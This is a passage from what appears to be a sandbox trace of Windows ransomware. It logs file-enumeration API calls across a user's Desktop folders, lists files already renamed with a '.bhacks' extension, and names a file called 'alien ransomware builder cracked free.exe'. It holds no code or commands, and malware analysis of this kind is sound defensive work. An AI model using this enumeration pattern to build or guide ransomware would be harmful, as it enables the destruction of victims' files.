ftCreationTime.dwLowDateTime=0xf01d96e0, ftCreationTime.dwHighDateTime=0x1d5d6ea, ftLastAccessTime.dwLowDateTime=0x726bd8e0, ftLastAccessTime.dwHighDateTime=0x1d5c85a, ftLastWriteTime.dwLowDateTime=0x726bd8e0, ftLastWriteTime.dwHighDateTime=0x1d5c85a, nFileSizeHigh=0x0, nFileSizeLow=0xbe65, dwReserved0=0x0, dwReserved1=0x0, cFileName="FisMdRNWBNOEJ4Av.swf", cAlternateFileName="FISMDR~1.SWF")) returned 1 [0065.101] FindNextFileW (in: hFindFile=0x9bef00, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7febd840, ftCreationTime.dwHighDateTime=0x1d5d678, ftLastAccessTime.dwLowDateTime=0x2be003f0, ftLastAccessTime.dwHighDateTime=0x1d5d729, ftLastWriteTime.dwLowDateTime=0x2be003f0, ftLastWriteTime.dwHighDateTime=0x1d5d729, nFileSizeHigh=0x0, nFileSizeLow=0x7812, dwReserved0=0x0, dwReserved1=0x0, cFileName="JFBPLC7ZEPj.ppt", cAlternateFileName="JFBPLC~1.PPT")) returned 1 [0065.101] FindNextFileW (in: hFindFile=0x9bef00, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd50430, ftCreationTime.dwHighDateTime=0x1d5d21c, ftLastAccessTime.dwLowDateTime=0xf6f6dab0, ftLastAccessTime.dwHighDateTime=0x1d5ce31, ftLastWriteTime.dwLowDateTime=0xf6f6dab0, ftLastWriteTime.dwHighDateTime=0x1d5ce31, nFileSizeHigh=0x0, nFileSizeLow=0x42b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="RJ4fo8BlUIkNkFgvJDB3.wav", cAlternateFileName="RJ4FO8~1.WAV")) returned 1 [0065.101] FindNextFileW (in: hFindFile=0x9bef00, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14a3e890, ftCreationTime.dwHighDateTime=0x1d5cc94, ftLastAccessTime.dwLowDateTime=0x99291d00, ftLastAccessTime.dwHighDateTime=0x1d5d758, ftLastWriteTime.dwLowDateTime=0x99291d00, ftLastWriteTime.dwHighDateTime=0x1d5d758, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="uqU-SQkb", cAlternateFileName="")) returned 1 [0065.101] FindNextFileW (in: hFindFile=0x9bef00, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14a3e890, ftCreationTime.dwHighDateTime=0x1d5cc94, ftLastAccessTime.dwLowDateTime=0x99291d00, ftLastAccessTime.dwHighDateTime=0x1d5d758, ftLastWriteTime.dwLowDateTime=0x99291d00, ftLastWriteTime.dwHighDateTime=0x1d5d758, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="uqU-SQkb", cAlternateFileName="")) returned 0 [0065.101] FindClose (in: hFindFile=0x9bef00 | out: hFindFile=0x9bef00) returned 1 [0065.101] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ED 0nXQ VIkUvYr6\\*.cs", lpFindFileData=0x6fe810 | out: lpFindFileData=0x6fe810*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0065.102] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ED 0nXQ VIkUvYr6\\uqU-SQkb\\*", lpFindFileData=0x6fe790 | out: lpFindFileData=0x6fe790*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14a3e890, ftCreationTime.dwHighDateTime=0x1d5cc94, ftLastAccessTime.dwLowDateTime=0x99291d00, ftLastAccessTime.dwHighDateTime=0x1d5d758, ftLastWriteTime.dwLowDateTime=0x99291d00, ftLastWriteTime.dwHighDateTime=0x1d5d758, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x9bf140 [0065.102] FindNextFileW (in: hFindFile=0x9bf140, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14a3e890, ftCreationTime.dwHighDateTime=0x1d5cc94, ftLastAccessTime.dwLowDateTime=0x99291d00, ftLastAccessTime.dwHighDateTime=0x1d5d758, ftLastWriteTime.dwLowDateTime=0x99291d00, ftLastWriteTime.dwHighDateTime=0x1d5d758, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.102] FindNextFileW (in: hFindFile=0x9bf140, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6bda560, ftCreationTime.dwHighDateTime=0x1d5c954, ftLastAccessTime.dwLowDateTime=0xb7ba9f80, ftLastAccessTime.dwHighDateTime=0x1d5cd4b, ftLastWriteTime.dwLowDateTime=0xb7ba9f80, ftLastWriteTime.dwHighDateTime=0x1d5cd4b, nFileSizeHigh=0x0, nFileSizeLow=0x3271, dwReserved0=0x0, dwReserved1=0x0, cFileName="DOdivRJBTXgzUJ.wav", cAlternateFileName="DODIVR~1.WAV")) returned 1 [0065.102] FindNextFileW (in: hFindFile=0x9bf140, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71fd8190, ftCreationTime.dwHighDateTime=0x1d5d3dd, ftLastAccessTime.dwLowDateTime=0x25c817f0, ftLastAccessTime.dwHighDateTime=0x1d5ce55, ftLastWriteTime.dwLowDateTime=0x25c817f0, ftLastWriteTime.dwHighDateTime=0x1d5ce55, nFileSizeHigh=0x0, nFileSizeLow=0xb4eb, dwReserved0=0x0, dwReserved1=0x0, cFileName="E2jRFWUv.xlsx", cAlternateFileName="E2JRFW~1.XLS")) returned 1 [0065.102] FindNextFileW (in: hFindFile=0x9bf140, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd9298a40, ftCreationTime.dwHighDateTime=0x1d5cdc4, ftLastAccessTime.dwLowDateTime=0xb615c9a0, ftLastAccessTime.dwHighDateTime=0x1d5d360, ftLastWriteTime.dwLowDateTime=0xb615c9a0, ftLastWriteTime.dwHighDateTime=0x1d5d360, nFileSizeHigh=0x0, nFileSizeLow=0x68aa, dwReserved0=0x0, dwReserved1=0x0, cFileName="krWg9z-VUaci.wav", cAlternateFileName="KRWG9Z~1.WAV")) returned 1 [0065.102] FindNextFileW (in: hFindFile=0x9bf140, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa5714a10, ftCreationTime.dwHighDateTime=0x1d5d59b, ftLastAccessTime.dwLowDateTime=0xafa97800, ftLastAccessTime.dwHighDateTime=0x1d5d2cf, ftLastWriteTime.dwLowDateTime=0xafa97800, ftLastWriteTime.dwHighDateTime=0x1d5d2cf, nFileSizeHigh=0x0, nFileSizeLow=0x10b8b, dwReserved0=0x0, dwReserved1=0x0, cFileName="KsPC3.bmp", cAlternateFileName="")) returned 1 [0065.102] FindNextFileW (in: hFindFile=0x9bf140, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c0240, ftCreationTime.dwHighDateTime=0x1d5d7c3, ftLastAccessTime.dwLowDateTime=0x626ed2a0, ftLastAccessTime.dwHighDateTime=0x1d5ccb3, ftLastWriteTime.dwLowDateTime=0x626ed2a0, ftLastWriteTime.dwHighDateTime=0x1d5ccb3, nFileSizeHigh=0x0, nFileSizeLow=0xad34, dwReserved0=0x0, dwReserved1=0x0, cFileName="kZHWiDNy.mp4", cAlternateFileName="")) returned 1 [0065.102] FindNextFileW (in: hFindFile=0x9bf140, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2d402a0, ftCreationTime.dwHighDateTime=0x1d5d269, ftLastAccessTime.dwLowDateTime=0x6cdeacf0, ftLastAccessTime.dwHighDateTime=0x1d5d1eb, ftLastWriteTime.dwLowDateTime=0x6cdeacf0, ftLastWriteTime.dwHighDateTime=0x1d5d1eb, nFileSizeHigh=0x0, nFileSizeLow=0xad19, dwReserved0=0x0, dwReserved1=0x0, cFileName="Oo6K.m4a", cAlternateFileName="")) returned 1 [0065.102] FindNextFileW (in: hFindFile=0x9bf140, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcbaf9c0, ftCreationTime.dwHighDateTime=0x1d5d70b, ftLastAccessTime.dwLowDateTime=0x47b550f0, ftLastAccessTime.dwHighDateTime=0x1d5c91c, ftLastWriteTime.dwLowDateTime=0x47b550f0, ftLastWriteTime.dwHighDateTime=0x1d5c91c, nFileSizeHigh=0x0, nFileSizeLow=0x168cf, dwReserved0=0x0, dwReserved1=0x0, cFileName="TXjqoZIp1 VeX-aMqDQ6.bmp", cAlternateFileName="TXJQOZ~1.BMP")) returned 1 [0065.102] FindNextFileW (in: hFindFile=0x9bf140, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcbaf9c0, ftCreationTime.dwHighDateTime=0x1d5d70b, ftLastAccessTime.dwLowDateTime=0x47b550f0, ftLastAccessTime.dwHighDateTime=0x1d5c91c, ftLastWriteTime.dwLowDateTime=0x47b550f0, ftLastWriteTime.dwHighDateTime=0x1d5c91c, nFileSizeHigh=0x0, nFileSizeLow=0x168cf, dwReserved0=0x0, dwReserved1=0x0, cFileName="TXjqoZIp1 VeX-aMqDQ6.bmp", cAlternateFileName="TXJQOZ~1.BMP")) returned 0 [0065.102] FindClose (in: hFindFile=0x9bf140 | out: hFindFile=0x9bf140) returned 1 [0065.102] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ED 0nXQ VIkUvYr6\\uqU-SQkb\\*.cs", lpFindFileData=0x6fe810 | out: lpFindFileData=0x6fe810*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0065.103] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\yi TyUTEx1dVRHalW\\*", lpFindFileData=0x6fe790 | out: lpFindFileData=0x6fe790*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2aa462e0, ftCreationTime.dwHighDateTime=0x1d5d5b9, ftLastAccessTime.dwLowDateTime=0x2451772f, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2451772f, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x9beb40 [0065.103] FindNextFileW (in: hFindFile=0x9beb40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2aa462e0, ftCreationTime.dwHighDateTime=0x1d5d5b9, ftLastAccessTime.dwLowDateTime=0x2451772f, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2451772f, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.103] FindNextFileW (in: hFindFile=0x9beb40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1418d380, ftCreationTime.dwHighDateTime=0x1d5ca0b, ftLastAccessTime.dwLowDateTime=0x9be42560, ftLastAccessTime.dwHighDateTime=0x1d5d165, ftLastWriteTime.dwLowDateTime=0x9be42560, ftLastWriteTime.dwHighDateTime=0x1d5d165, nFileSizeHigh=0x0, nFileSizeLow=0x15674, dwReserved0=0x0, dwReserved1=0x0, cFileName="7HlCuwMi.pptx", cAlternateFileName="7HLCUW~1.PPT")) returned 1 [0065.103] FindNextFileW (in: hFindFile=0x9beb40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58416d40, ftCreationTime.dwHighDateTime=0x1d5d368, ftLastAccessTime.dwLowDateTime=0x95e58810, ftLastAccessTime.dwHighDateTime=0x1d5d616, ftLastWriteTime.dwLowDateTime=0x95e58810, ftLastWriteTime.dwHighDateTime=0x1d5d616, nFileSizeHigh=0x0, nFileSizeLow=0x171e1, dwReserved0=0x0, dwReserved1=0x0, cFileName="CZR-hhw59bi.bmp", cAlternateFileName="CZR-HH~1.BMP")) returned 1 [0065.103] FindNextFileW (in: hFindFile=0x9beb40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x242b1fc1, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x242b1fc1, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x24370b6b, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x16750, dwReserved0=0x0, dwReserved1=0x0, cFileName="DN0hvZxxCeH-NYAF_H.png.bhacks", cAlternateFileName="DN0HVZ~1.BHA")) returned 1 [0065.103] FindNextFileW (in: hFindFile=0x9beb40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2ffd140, ftCreationTime.dwHighDateTime=0x1d5d3a0, ftLastAccessTime.dwLowDateTime=0xa565dfd0, ftLastAccessTime.dwHighDateTime=0x1d5c89f, ftLastWriteTime.dwLowDateTime=0xa565dfd0, ftLastWriteTime.dwHighDateTime=0x1d5c89f, nFileSizeHigh=0x0, nFileSizeLow=0xf21c, dwReserved0=0x0, dwReserved1=0x0, cFileName="dp gvQR2 MYwMzsW1yo.mkv", cAlternateFileName="DPGVQR~1.MKV")) returned 1 [0065.103] FindNextFileW (in: hFindFile=0x9beb40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x243e31c1, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x243e31c1, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2451772f, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0xa850, dwReserved0=0x0, dwReserved1=0x0, cFileName="iCkvEIW.png.bhacks", cAlternateFileName="ICKVEI~1.BHA")) returned 1 [0065.103] FindNextFileW (in: hFindFile=0x9beb40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x434c9c30, ftCreationTime.dwHighDateTime=0x1d5cc28, ftLastAccessTime.dwLowDateTime=0x11453020, ftLastAccessTime.dwHighDateTime=0x1d5cfa8, ftLastWriteTime.dwLowDateTime=0x11453020, ftLastWriteTime.dwHighDateTime=0x1d5cfa8, nFileSizeHigh=0x0, nFileSizeLow=0x4dcd, dwReserved0=0x0, dwReserved1=0x0, cFileName="kFQqlJY89ZuDyS.ppt", cAlternateFileName="KFQQLJ~1.PPT")) returned 1 [0065.103] FindNextFileW (in: hFindFile=0x9beb40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa5061a0, ftCreationTime.dwHighDateTime=0x1d5cd77, ftLastAccessTime.dwLowDateTime=0xf08f0a70, ftLastAccessTime.dwHighDateTime=0x1d5cd33, ftLastWriteTime.dwLowDateTime=0xf08f0a70, ftLastWriteTime.dwHighDateTime=0x1d5cd33, nFileSizeHigh=0x0, nFileSizeLow=0x2338, dwReserved0=0x0, dwReserved1=0x0, cFileName="luPvkk7BP6.m4a", cAlternateFileName="LUPVKK~1.M4A")) returned 1 [0065.103] FindNextFileW (in: hFindFile=0x9beb40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49e65510, ftCreationTime.dwHighDateTime=0x1d5d6ee, ftLastAccessTime.dwLowDateTime=0x811c8ad0, ftLastAccessTime.dwHighDateTime=0x1d5cd8a, ftLastWriteTime.dwLowDateTime=0x811c8ad0, ftLastWriteTime.dwHighDateTime=0x1d5cd8a, nFileSizeHigh=0x0, nFileSizeLow=0x17e9b, dwReserved0=0x0, dwReserved1=0x0, cFileName="P-7IEYH2CNc0UByn.m4a", cAlternateFileName="P-7IEY~1.M4A")) returned 1 [0065.103] FindNextFileW (in: hFindFile=0x9beb40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49e65510, ftCreationTime.dwHighDateTime=0x1d5d6ee, ftLastAccessTime.dwLowDateTime=0x811c8ad0, ftLastAccessTime.dwHighDateTime=0x1d5cd8a, ftLastWriteTime.dwLowDateTime=0x811c8ad0, ftLastWriteTime.dwHighDateTime=0x1d5cd8a, nFileSizeHigh=0x0, nFileSizeLow=0x17e9b, dwReserved0=0x0, dwReserved1=0x0, cFileName="P-7IEYH2CNc0UByn.m4a", cAlternateFileName="P-7IEY~1.M4A")) returned 0 [0065.103] FindClose (in: hFindFile=0x9beb40 | out: hFindFile=0x9beb40) returned 1 [0065.103] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\yi TyUTEx1dVRHalW\\*.cs", lpFindFileData=0x6fe810 | out: lpFindFileData=0x6fe810*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0065.103] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6feaa0) returned 1 [0065.103] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6fea60) returned 1 [0065.104] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\", nBufferLength=0x105, lpBuffer=0x6fe690, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\", lpFilePart=0x0) returned 0x18 [0065.104] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6feb20) returned 1 [0065.104] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\" (normalized: "c:\\users\\fd1hvy\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x6fec00 | out: lpFileInformation=0x6fec00*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x2428bb9d, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2428bb9d, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x3000)) returned 1 [0065.104] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6feae0) returned 1 [0065.104] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\", nBufferLength=0x105, lpBuffer=0x6fe6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\", lpFilePart=0x0) returned 0x18 [0065.104] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6feb60) returned 1 [0065.104] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\", nBufferLength=0x105, lpBuffer=0x6fe600, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\", lpFilePart=0x0) returned 0x18 [0065.104] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\*.cpp", lpFindFileData=0x6fe880 | out: lpFindFileData=0x6fe880*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0065.104] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\*", lpFindFileData=0x6fe790 | out: lpFindFileData=0x6fe790*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x2428bb9d, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2428bb9d, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x9be540 [0065.104] FindNextFileW (in: hFindFile=0x9be540, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x2428bb9d, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2428bb9d, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.104] FindNextFileW (in: hFindFile=0x9be540, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e4518a0, ftCreationTime.dwHighDateTime=0x1d5c950, ftLastAccessTime.dwLowDateTime=0xc8577a40, ftLastAccessTime.dwHighDateTime=0x1d5c9d9, ftLastWriteTime.dwLowDateTime=0xc8577a40, ftLastWriteTime.dwHighDateTime=0x1d5c9d9, nFileSizeHigh=0x0, nFileSizeLow=0x3faa, dwReserved0=0x0, dwReserved1=0x0, cFileName="-yB2WD9ZHipl10.mkv", cAlternateFileName="-YB2WD~1.MKV")) returned 1 [0065.104] FindNextFileW (in: hFindFile=0x9be540, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe913c2c0, ftCreationTime.dwHighDateTime=0x1d5c821, ftLastAccessTime.dwLowDateTime=0x951b3080, ftLastAccessTime.dwHighDateTime=0x1d5cb10, ftLastWriteTime.dwLowDateTime=0x951b3080, ftLastWriteTime.dwHighDateTime=0x1d5cb10, nFileSizeHigh=0x0, nFileSizeLow=0x4b96, dwReserved0=0x0, dwReserved1=0x0, cFileName="0LCfOxpKhBY.mkv", cAlternateFileName="0LCFOX~1.MKV")) returned 1 [0065.104] FindNextFileW (in: hFindFile=0x9be540, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc7f6e50, ftCreationTime.dwHighDateTime=0x1d5c9da, ftLastAccessTime.dwLowDateTime=0x9744b650, ftLastAccessTime.dwHighDateTime=0x1d5c896, ftLastWriteTime.dwLowDateTime=0x9744b650, ftLastWriteTime.dwHighDateTime=0x1d5c896, nFileSizeHigh=0x0, nFileSizeLow=0x67b1, dwReserved0=0x0, dwReserved1=0x0, cFileName="63ZOACO2R_kPqlEG.m4a", cAlternateFileName="63ZOAC~1.M4A")) returned 1 [0065.104] FindNextFileW (in: hFindFile=0x9be540, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe41d58d0, ftCreationTime.dwHighDateTime=0x1d5cc31, ftLastAccessTime.dwLowDateTime=0xef3f2c90, ftLastAccessTime.dwHighDateTime=0x1d5c9eb, ftLastWriteTime.dwLowDateTime=0xef3f2c90, ftLastWriteTime.dwHighDateTime=0x1d5c9eb, nFileSizeHigh=0x0, nFileSizeLow=0xe243, dwReserved0=0x0, dwReserved1=0x0, cFileName="6yMUE.flv", cAlternateFileName="")) returned 1 [0065.104] FindNextFileW (in: hFindFile=0x9be540, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4105fa60, ftCreationTime.dwHighDateTime=0x1d5cc92, ftLastAccessTime.dwLowDateTime=0x3135af40, ftLastAccessTime.dwHighDateTime=0x1d5c931, ftLastWriteTime.dwLowDateTime=0x3135af40, ftLastWriteTime.dwHighDateTime=0x1d5c931, nFileSizeHigh=0x0, nFileSizeLow=0x8f23, dwReserved0=0x0, dwReserved1=0x0, cFileName="7jATM.wav", cAlternateFileName="")) returned 1 [0065.104] FindNextFileW (in: hFindFile=0x9be540, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81d84fe0, ftCreationTime.dwHighDateTime=0x1d5ca4c, ftLastAccessTime.dwLowDateTime=0x349b2b0, ftLastAccessTime.dwHighDateTime=0x1d5d1f2, ftLastWriteTime.dwLowDateTime=0x349b2b0, ftLastWriteTime.dwHighDateTime=0x1d5d1f2, nFileSizeHigh=0x0, nFileSizeLow=0xcdc4, dwReserved0=0x0, dwReserved1=0x0, cFileName="9gEE-.bmp", cAlternateFileName="")) returned 1 [0065.104] FindNextFileW (in: hFindFile=0x9be540, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf99d0b80, ftCreationTime.dwHighDateTime=0x1d5dff8, ftLastAccessTime.dwLowDateTime=0xf99d0b80, ftLastAccessTime.dwHighDateTime=0x1d5dff8, ftLastWriteTime.dwLowDateTime=0xf7d34800, ftLastWriteTime.dwHighDateTime=0x1d5dff8, nFileSizeHigh=0x0, nFileSizeLow=0xf0b23, dwReserved0=0x0, dwReserved1=0x0, cFileName="alien ransomware builder cracked free.exe", cAlternateFileName="ALIENR~1.EXE")) returned 1 [0065.104] FindNextFileW (in: hFindFile=0x9be540, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2336d40, ftCreationTime.dwHighDateTime=0x1d5d3d8, ftLastAccessTime.dwLowDateTime=0xb1ce5320, ftLastAccessTime.dwHighDateTime=0x1d5d3e8, ftLastWriteTime.dwLowDateTime=0xb1ce5320, ftLastWriteTime.dwHighDateTime=0x1d5d3e8, nFileSizeHigh=0x0, nFileSizeLow=0xd39f, dwReserved0=0x0, dwReserved1=0x0, cFileName="BlDya8Gp-4HPz6uNsS.xls", cAlternateFileName="BLDYA8~1.XLS")) returned 1 [0065.104] FindNextFileW (in: hFindFile=0x9be540, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x440792d0, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x440792d0, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce389e99, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0065.105] FindNextFileW (in: hFindFile=0x9be540, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23825ba3, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x23825ba3, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x23b46f90, 